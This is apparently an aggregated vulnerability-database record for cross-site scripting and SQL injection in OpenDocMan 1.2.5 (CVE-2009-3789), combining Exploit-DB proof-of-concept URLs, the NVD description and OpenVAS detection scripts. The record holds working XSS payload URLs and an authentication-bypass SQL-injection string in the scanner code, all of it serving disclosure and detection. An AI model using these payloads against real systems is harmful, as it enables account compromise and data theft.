ID EDB-ID:33301 Type exploitdb Reporter Amol Naik Modified 2009-10-21T00:00:00
Description
OpenDocMan 1.2.5 profile.php XSS. CVE-2009-3789. Webapps exploit for php platform
source: http://www.securityfocus.com/bid/36777/info
OpenDocMan is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
OpenDocMan 1.2.5 is vulnerable; other versions may also be affected.
http://www.example.com/opendocman/profile.php/"><script>alert(1)</script>
{"id": "EDB-ID:33301", "hash": "5c707c44709053c7db1875623e09c9e3", "type": "exploitdb", "bulletinFamily": "exploit", "title": "OpenDocMan 1.2.5 profile.php XSS", "description": "OpenDocMan 1.2.5 profile.php XSS. CVE-2009-3789. Webapps exploit for php platform", "published": "2009-10-21T00:00:00", "modified": "2009-10-21T00:00:00", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "href": "https://www.exploit-db.com/exploits/33301/", "reporter": "Amol Naik", "references": [], "cvelist": ["CVE-2009-3789"], "lastseen": "2016-02-03T18:54:06", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 4.4, "vector": "NONE", "modified": "2016-02-03T18:54:06"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-3789"]}, {"type": "exploitdb", "idList": ["EDB-ID:33303", "EDB-ID:33297", "EDB-ID:33300", "EDB-ID:33304", "EDB-ID:9903", "EDB-ID:33299", "EDB-ID:33298", "EDB-ID:33295", "EDB-ID:33305", "EDB-ID:33302"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310900885", "OPENVAS:900885"]}], "modified": "2016-02-03T18:54:06"}, "vulnersScore": 4.4}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/33301/", "sourceData": "source: http://www.securityfocus.com/bid/36777/info\r\n \r\nOpenDocMan is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.\r\n \r\nExploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.\r\n \r\nOpenDocMan 1.2.5 is vulnerable; other versions may also be affected. \r\n\r\nhttp://www.example.com/opendocman/profile.php/\"><script>alert(1)</script>", "osvdbidlist": ["59308"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:10:00", "bulletinFamily": "NVD", "description": "Multiple cross-site scripting (XSS) vulnerabilities in OpenDocMan 1.2.5 allow remote attackers to inject arbitrary web script or HTML via the last_message parameter to (1) add.php, (2) toBePublished.php, (3) index.php, and (4) admin.php; the PATH_INFO to the default URI to (5) category.php, (6) department.php, (7) profile.php, (8) rejects.php, (9) search.php, (10) toBePublished.php, (11) user.php, and (12) view_file.php; and (13) the caller parameter in a Modify User action to user.php.", "modified": "2017-08-17T01:31:00", "id": "CVE-2009-3789", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3789", "published": "2009-10-26T17:30:00", "title": "CVE-2009-3789", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "exploitdb": [{"lastseen": "2016-02-03T18:53:44", "bulletinFamily": "exploit", "description": "OpenDocMan 1.2.5 admin.php last_message Parameter XSS. CVE-2009-3789. Webapps exploit for php platform", "modified": "2009-10-21T00:00:00", "published": "2009-10-21T00:00:00", "id": "EDB-ID:33298", "href": "https://www.exploit-db.com/exploits/33298/", "type": "exploitdb", "title": "OpenDocMan 1.2.5 admin.php last_message Parameter XSS", "sourceData": "source: http://www.securityfocus.com/bid/36777/info\r\n \r\nOpenDocMan is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.\r\n \r\nExploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.\r\n \r\nOpenDocMan 1.2.5 is vulnerable; other versions may also be affected. \r\n\r\nhttp://www.example.com/opendocman/admin.php?last_message=<script>alert(1)</script>", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/33298/"}, {"lastseen": "2016-02-03T18:53:22", "bulletinFamily": "exploit", "description": "OpenDocMan 1.2.5 add.php last_message Parameter XSS. CVE-2009-3789. Webapps exploit for php platform", "modified": "2009-10-21T00:00:00", "published": "2009-10-21T00:00:00", "id": "EDB-ID:33295", "href": "https://www.exploit-db.com/exploits/33295/", "type": "exploitdb", "title": "OpenDocMan 1.2.5 add.php last_message Parameter XSS", "sourceData": "source: http://www.securityfocus.com/bid/36777/info\r\n\r\nOpenDocMan is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.\r\n\r\nExploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.\r\n\r\nOpenDocMan 1.2.5 is vulnerable; other versions may also be affected. \r\n\r\nhttp://www.example.com/opendocman/add.php?last_message=<script>alert(1)</script>", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/33295/"}, {"lastseen": "2016-02-03T18:53:52", "bulletinFamily": "exploit", "description": "OpenDocMan 1.2.5 category.php XSS. CVE-2009-3789. Webapps exploit for php platform", "modified": "2009-10-21T00:00:00", "published": "2009-10-21T00:00:00", "id": "EDB-ID:33299", "href": "https://www.exploit-db.com/exploits/33299/", "type": "exploitdb", "title": "OpenDocMan 1.2.5 category.php XSS", "sourceData": "source: http://www.securityfocus.com/bid/36777/info\r\n \r\nOpenDocMan is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.\r\n \r\nExploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.\r\n \r\nOpenDocMan 1.2.5 is vulnerable; other versions may also be affected. \r\n\r\nhttp://www.example.com/opendocman/category.php/\"><script>alert(1)</script><\"?aku=c3VibWl0PWFkZCZzdGF0ZT0y", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/33299/"}, {"lastseen": "2016-02-03T18:53:29", "bulletinFamily": "exploit", "description": "OpenDocMan 1.2.5 toBePublished.php Multiple Parameter XSS. CVE-2009-3789. Webapps exploit for php platform", "modified": "2009-10-21T00:00:00", "published": "2009-10-21T00:00:00", "id": "EDB-ID:33296", "href": "https://www.exploit-db.com/exploits/33296/", "type": "exploitdb", "title": "OpenDocMan 1.2.5 toBePublished.php Multiple Parameter XSS", "sourceData": "source: http://www.securityfocus.com/bid/36777/info\r\n \r\nOpenDocMan is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.\r\n \r\nExploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.\r\n \r\nOpenDocMan 1.2.5 is vulnerable; other versions may also be affected. \r\n\r\nhttp://www.example.com/opendocman/toBePublished.php/\"><script>alert(1)</script>\r\nhttp://www.example.com/opendocman/toBePublished.php?last_message=<script>alert(1)</script>", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/33296/"}, {"lastseen": "2016-02-03T18:54:14", "bulletinFamily": "exploit", "description": "OpenDocMan 1.2.5 rejects.php XSS. CVE-2009-3789 . Webapps exploit for php platform", "modified": "2009-10-21T00:00:00", "published": "2009-10-21T00:00:00", "id": "EDB-ID:33302", "href": "https://www.exploit-db.com/exploits/33302/", "type": "exploitdb", "title": "OpenDocMan 1.2.5 rejects.php XSS", "sourceData": "source: http://www.securityfocus.com/bid/36777/info\r\n \r\nOpenDocMan is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.\r\n \r\nExploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.\r\n \r\nOpenDocMan 1.2.5 is vulnerable; other versions may also be affected. \r\n\r\nhttp://www.example.com/opendocman/rejects.php/\"><script>alert(1)</script>", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/33302/"}, {"lastseen": "2016-02-03T18:54:39", "bulletinFamily": "exploit", "description": "OpenDocMan 1.2.5 view_file.php XSS. CVE-2009-3789. Webapps exploit for php platform", "modified": "2009-10-21T00:00:00", "published": "2009-10-21T00:00:00", "id": "EDB-ID:33305", "href": "https://www.exploit-db.com/exploits/33305/", "type": "exploitdb", "title": "OpenDocMan 1.2.5 view_file.php XSS", "sourceData": "source: http://www.securityfocus.com/bid/36777/info\r\n \r\nOpenDocMan is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.\r\n \r\nExploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.\r\n \r\nOpenDocMan 1.2.5 is vulnerable; other versions may also be affected. \r\n\r\nhttp://www.example.com/opendocman/view_file.php/\"><script>alert(1)</script><\"?aku=aWQ9NiZzdGF0ZT0z", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/33305/"}, {"lastseen": "2016-02-03T18:53:37", "bulletinFamily": "exploit", "description": "OpenDocMan 1.2.5 index.php last_message Parameter XSS. CVE-2009-3789. Webapps exploit for php platform", "modified": "2009-10-21T00:00:00", "published": "2009-10-21T00:00:00", "id": "EDB-ID:33297", "href": "https://www.exploit-db.com/exploits/33297/", "type": "exploitdb", "title": "OpenDocMan 1.2.5 index.php last_message Parameter XSS", "sourceData": "source: http://www.securityfocus.com/bid/36777/info\r\n \r\nOpenDocMan is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.\r\n \r\nExploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.\r\n \r\nOpenDocMan 1.2.5 is vulnerable; other versions may also be affected. \r\n\r\nhttp://www.example.com/opendocman/index.php?last_message=<script>alert(1)</script>", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/33297/"}, {"lastseen": "2016-02-03T18:53:59", "bulletinFamily": "exploit", "description": "OpenDocMan 1.2.5 department.php XSS. CVE-2009-3789 . Webapps exploit for php platform", "modified": "2009-10-21T00:00:00", "published": "2009-10-21T00:00:00", "id": "EDB-ID:33300", "href": "https://www.exploit-db.com/exploits/33300/", "type": "exploitdb", "title": "OpenDocMan 1.2.5 department.php XSS", "sourceData": "source: http://www.securityfocus.com/bid/36777/info\r\n \r\nOpenDocMan is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.\r\n \r\nExploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.\r\n \r\nOpenDocMan 1.2.5 is vulnerable; other versions may also be affected. \r\n\r\nhttp://www.example.com/opendocman/department.php/\"><script>alert(1)</script><\"?aku=c3VibWl0PXNob3dwaWNrJnN0YXRlPTI=", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/33300/"}, {"lastseen": "2016-02-03T18:54:23", "bulletinFamily": "exploit", "description": "OpenDocMan 1.2.5 search.php XSS. CVE-2009-3789. Webapps exploit for php platform", "modified": "2009-10-21T00:00:00", "published": "2009-10-21T00:00:00", "id": "EDB-ID:33303", "href": "https://www.exploit-db.com/exploits/33303/", "type": "exploitdb", "title": "OpenDocMan 1.2.5 - search.php XSS", "sourceData": "source: http://www.securityfocus.com/bid/36777/info\r\n \r\nOpenDocMan is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.\r\n \r\nExploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.\r\n \r\nOpenDocMan 1.2.5 is vulnerable; other versions may also be affected. \r\n\r\nhttp://www.example.com/opendocman/search.php/\"><script>alert(1)</script>", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/33303/"}, {"lastseen": "2016-02-03T18:54:32", "bulletinFamily": "exploit", "description": "OpenDocMan 1.2.5 user.php XSS. CVE-2009-3789. Webapps exploit for php platform", "modified": "2009-10-21T00:00:00", "published": "2009-10-21T00:00:00", "id": "EDB-ID:33304", "href": "https://www.exploit-db.com/exploits/33304/", "type": "exploitdb", "title": "OpenDocMan 1.2.5 user.php XSS", "sourceData": "source: http://www.securityfocus.com/bid/36777/info\r\n \r\nOpenDocMan is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.\r\n \r\nExploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.\r\n \r\nOpenDocMan 1.2.5 is vulnerable; other versions may also be affected. \r\n\r\nhttp://www.example.com/opendocman/user.php/\"><script>alert(1)</script><\"?aku=c3VibWl0PXNob3dwaWNrJnN0YXRlPTI=\r\nhttp://www.example.com/opendocman/user.php?submit=Modify+User&item=2&caller=/opendocman/\"><script>alert(123)</script><\"", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/33304/"}], "openvas": [{"lastseen": "2019-05-29T18:40:20", "bulletinFamily": "scanner", "description": "This host is running OpenDocMan and is prone to multiple Cross-Site\n Scripting and SQL Injection vulnerabilities.", "modified": "2019-05-14T00:00:00", "published": "2009-10-29T00:00:00", "id": "OPENVAS:1361412562310900885", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310900885", "title": "OpenDocMan Multiple XSS and SQL Injection Vulnerabilities", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# OpenDocMan Multiple XSS and SQL Injection Vulnerabilities\n#\n# Authors:\n# Sharath S <sharaths@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.900885\");\n script_version(\"2019-05-14T12:12:41+0000\");\n script_tag(name:\"last_modification\", value:\"2019-05-14 12:12:41 +0000 (Tue, 14 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2009-10-29 07:53:15 +0100 (Thu, 29 Oct 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2009-3788\", \"CVE-2009-3789\", \"CVE-2009-3801\");\n script_bugtraq_id(36777);\n script_name(\"OpenDocMan Multiple XSS and SQL Injection Vulnerabilities\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/30750/\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/53886\");\n script_xref(name:\"URL\", value:\"http://www.packetstormsecurity.org/0910-exploits/opendocman-sqlxss.txt\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_category(ACT_MIXED_ATTACK);\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_opendocman_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"OpenDocMan/installed\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to cause Cross-Site Scripting or\n SQL Injection attacks by executing arbitrary codes with in the context of the affected application.\");\n\n script_tag(name:\"affected\", value:\"OpenDocMan version prior to 1.2.5.2\");\n\n script_tag(name:\"insight\", value:\"- Input passed to the 'frmuser' and 'frmpass' parameters in 'index.php' is not\n properly sanitised before being used in SQL queries.\n\n - Input passed to the 'last_message' parameter in add.php, toBePublished.php,\n index.php, and admin.php, and input passed via the URL to category.php,\n department.php, profile.php, rejects.php, search.php, toBePublished.php,\n view_file.php, and user.php is not properly sanitised before being returned to the user.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"solution\", value:\"Upgrade to OpenDocMan version 1.2.5.2 or later.\");\n\n script_tag(name:\"summary\", value:\"This host is running OpenDocMan and is prone to multiple Cross-Site\n Scripting and SQL Injection vulnerabilities.\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"version_func.inc\");\n\ndocmanPort = get_http_port(default:80);\n\ndocmanVer = get_kb_item(\"www/\"+ docmanPort + \"/OpenDocMan\");\nif(!docmanVer)\n exit(0);\n\ndocmanVer = eregmatch(pattern:\"^(.+) under (/.*)$\", string:docmanVer);\nif(docmanVer[2] && !safe_checks())\n{\n filename = string(docmanVer[2] + \"/index.php\");\n host = http_host_name(port:docmanPort);\n\n authVariables = \"frmuser=admin' OR '1'='1&frmpass=&login=Enter\";\n sndReq1 = string(\"POST \", filename, \" HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"Referer: http://\", host, filename, \"\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen(authVariables), \"\\r\\n\\r\\n\",\n authVariables);\n rcvRes1 = http_send_recv(port:docmanPort, data:sndReq1);\n if(egrep(pattern:\"Location: out.php\", string:rcvRes1))\n {\n security_message(port:docmanPort, data:\"The target host was found to be vulnerable.\");\n exit(0);\n }\n\n sndReq2 = http_get(item:string(docmanVer[2], \"/index.php?last_message=\" +\n \"<script>alert(1)</script>\"), port:docmanPort);\n rcvRes2 = http_send_recv(port:docmanPort, data:sndReq2);\n if(rcvRes2 =~ \"HTTP/1\\.. 200\" && \"<script>alert(1)</script><\" >< rcvRes2)\n {\n security_message(port:docmanPort, data:\"The target host was found to be vulnerable.\");\n exit(0);\n }\n}\n\nif(docmanVer[1])\n{\n if(version_is_less(version:docmanVer[1], test_version:\"1.2.5.2\")){\n security_message(port:docmanPort, data:\"The target host was found to be vulnerable.\");\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-02T21:14:12", "bulletinFamily": "scanner", "description": "This host is running OpenDocMan and is prone to multiple Cross-Site\n Scripting and SQL Injection vulnerabilities.", "modified": "2017-01-27T00:00:00", "published": "2009-10-29T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=900885", "id": "OPENVAS:900885", "title": "OpenDocMan Multiple XSS and SQL Injection Vulnerabilities", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_opendocman_xss_n_sql_inj_vuln.nasl 5122 2017-01-27 12:16:00Z teissa $\n#\n# OpenDocMan Multiple XSS and SQL Injection Vulnerabilities\n#\n# Authors:\n# Sharath S <sharaths@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will allow attacker to cause Cross-Site Scripting or\n SQL Injection attacks by executing arbitrary codes with in the context of the\n affected application.\n Impact Level: Application.\";\ntag_affected = \"OpenDocMan version prior to 1.2.5.2\";\ntag_insight = \"- Input passed to the 'frmuser' and 'frmpass' parameters in 'index.php' is not\n properly sanitised before being used in SQL queries.\n - Input passed to the 'last_message' parameter in add.php, toBePublished.php,\n index.php, and admin.php, and input passed via the URL to category.php,\n department.php, profile.php, rejects.php, search.php, toBePublished.php,\n view_file.php, and user.php is not properly sanitised before being returned\n to the user.\";\ntag_solution = \"Upgrade to OpenDocMan version 1.2.5.2 or later.\n http://www.opendocman.com/\";\ntag_summary = \"This host is running OpenDocMan and is prone to multiple Cross-Site\n Scripting and SQL Injection vulnerabilities.\";\n\nif(description)\n{\n script_id(900885);\n script_version(\"$Revision: 5122 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-01-27 13:16:00 +0100 (Fri, 27 Jan 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-29 07:53:15 +0100 (Thu, 29 Oct 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2009-3788\", \"CVE-2009-3789\", \"CVE-2009-3801\");\n script_bugtraq_id(36777);\n script_name(\"OpenDocMan Multiple XSS and SQL Injection Vulnerabilities\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/30750/\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/53886\");\n script_xref(name : \"URL\" , value : \"http://www.packetstormsecurity.org/0910-exploits/opendocman-sqlxss.txt\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_category(ACT_MIXED_ATTACK);\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_opendocman_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n\ninclude(\"http_func.inc\");\ninclude(\"version_func.inc\");\n\ndocmanPort = get_http_port(default:80);\nif(!docmanPort){\n exit(0);\n}\n\ndocmanVer = get_kb_item(\"www/\"+ docmanPort + \"/OpenDocMan\");\nif(!docmanVer){\n exit(0);\n}\n\ndocmanVer = eregmatch(pattern:\"^(.+) under (/.*)$\", string:docmanVer);\nif(docmanVer[2] && !safe_checks())\n{\n filename = string(docmanVer[2] + \"/index.php\");\n host = get_host_name();\n\n authVariables = \"frmuser=admin' OR '1'='1&frmpass=&login=Enter\";\n sndReq1 = string(\"POST \", filename, \" HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"Referer: http://\", host, filename, \"\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen(authVariables), \"\\r\\n\\r\\n\",\n authVariables);\n rcvRes1 = http_send_recv(port:docmanPort, data:sndReq1);\n if(egrep(pattern:\"Location: out.php\", string:rcvRes1))\n {\n security_message(docmanPort);\n exit(0);\n }\n\n sndReq2 = http_get(item:string(docmanVer[2], \"/index.php?last_message=\" +\n \"<script>alert(1)</script>\"), port:docmanPort);\n rcvRes2 = http_send_recv(port:docmanPort, data:sndReq2);\n if(rcvRes2 =~ \"HTTP/1\\.. 200\" && \"<script>alert(1)</script><\" >< rcvRes2)\n {\n security_message(docmanPort);\n exit(0);\n }\n}\n\nif(docmanVer[1])\n{\n # Check for OpenDocMan version prior to 1.2.5.2\n if(version_is_less(version:docmanVer[1], test_version:\"1.2.5.2\")){\n security_message(docmanPort);\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}